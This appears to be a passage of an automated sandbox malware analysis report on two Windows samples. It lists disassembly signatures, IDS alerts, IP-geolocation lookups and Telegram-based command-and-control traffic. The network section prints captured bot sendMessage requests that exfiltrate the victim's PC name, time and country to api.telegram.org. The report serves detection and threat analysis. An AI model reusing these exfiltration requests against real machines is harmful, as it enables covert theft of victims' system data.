Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06420311h	10_2_06420040
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06424321h	10_2_06424050
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642A34Bh	10_2_0642A050
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642F95Bh	10_2_0642F660
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06422312h	10_2_06422068
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06428B63h	10_2_06428868
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06426349h	10_2_06426078
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642E173h	10_2_0642DE78
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642EB03h	10_2_0642E808
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064210D9h	10_2_06420E08
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06427D0Bh	10_2_06427A10
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064250EAh	10_2_06424E18
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642D31Bh	10_2_0642D020
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642BB33h	10_2_0642B838
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06422791h	10_2_064224C0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064299BBh	10_2_064296C0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642EFCBh	10_2_0642ECD0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064207A9h	10_2_064204D8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064281D3h	10_2_06427ED8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642D7E3h	10_2_0642D4E8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642737Bh	10_2_06427080
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06423559h	10_2_06423288
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642C98Bh	10_2_0642C690
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06421571h	10_2_064212A0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642B1A3h	10_2_0642AEA8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06425581h	10_2_064252B0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642E63Bh	10_2_0642E340
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06425A19h	10_2_06425748
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06427843h	10_2_06427548
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06422C29h	10_2_06422958
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642CE53h	10_2_0642CB58
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642B66Bh	10_2_0642B370
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06420C41h	10_2_06420970
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642BFFBh	10_2_0642BD00
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06426882h	10_2_06426510
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642A813h	10_2_0642A518
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064239F1h	10_2_06423720
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642902Bh	10_2_06428D30
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06421A09h	10_2_06421738
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642C4C3h	10_2_0642C1C8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06421EA1h	10_2_06421BD0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06425EB1h	10_2_06425BE0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642ACDBh	10_2_0642A9E0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064230C1h	10_2_06422DF0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064294F3h	10_2_064291F8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06424C51h	10_2_06424980
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06429E83h	10_2_06429B88
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642F493h	10_2_0642F198
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642869Bh	10_2_064283A0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0642DCABh	10_2_0642D9B0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06423E89h	10_2_06423BB8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06462983h	10_2_06462688
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0646033Bh	10_2_06460040
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06461B2Bh	10_2_06461830
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06461FF3h	10_2_06461CF8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06461194h	10_2_06460E98
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06461663h	10_2_06461368
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06460803h	10_2_06460508
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064624BBh	10_2_064621C0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06460CCBh	10_2_064609D0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_064A51F0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_064A51DF
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_064A1D48
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_064A1D47
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then push 00000000h	10_2_06F32738
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then push 00000000h	10_2_06F31199
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	16_2_0224E228
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 051B93DAh	16_2_051B8FA8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 051B8C81h	16_2_051B89D0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 051B93DAh	16_2_051B9307
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF5185h	16_2_05DF4E48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFF878h	16_2_05DFF5D0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF4841h	16_2_05DF4598
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF7848h	16_2_05DF75A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFEFC8h	16_2_05DFED20
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF6F98h	16_2_05DF6CF0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF3F91h	16_2_05DF3CE8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF66E8h	16_2_05DF6440
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFE718h	16_2_05DFE470
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF5CCAh	16_2_05DF5C18
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF5CCAh	16_2_05DF5C20
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFDA10h	16_2_05DFD768
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF7CA0h	16_2_05DF79F8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF4C99h	16_2_05DF49F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF73F0h	16_2_05DF7148
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF43E9h	16_2_05DF4140
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFF420h	16_2_05DFF178
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFEB70h	16_2_05DFE8C8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF6B40h	16_2_05DF6898
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF3B39h	16_2_05DF3890
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFE2C0h	16_2_05DFE018
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFDE68h	16_2_05DFDBC0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFFCD0h	16_2_05DFFA28
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E751ADh	16_2_05E74FD0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E75B37h	16_2_05E74FD0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E73840h	16_2_05E73598
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_05E744D1
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E70740h	16_2_05E70498
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E726E0h	16_2_05E72438
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov esp, ebp	16_2_05E787C0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E719D8h	16_2_05E71730
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E7144Ah	16_2_05E711A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E733E8h	16_2_05E73140
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E702E8h	16_2_05E70040
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E70FF0h	16_2_05E70D48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E72F90h	16_2_05E72CE8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_05E74CF3
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E72288h	16_2_05E71FE0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E740F0h	16_2_05E73E48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E73C98h	16_2_05E739F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E70B98h	16_2_05E708F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E72B38h	16_2_05E72890
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E71E30h	16_2_05E71B88
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_05E74B13
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	16_2_06181684
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	16_2_061852E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:63655 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:63653 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.4:63641 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:707748%0D%0ADate%20and%20Time:%2007/03/2025%20/%2022:52:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20707748%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:707748%0D%0ADate%20and%20Time:%2008/03/2025%20/%2005:19:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20707748%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:63649 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
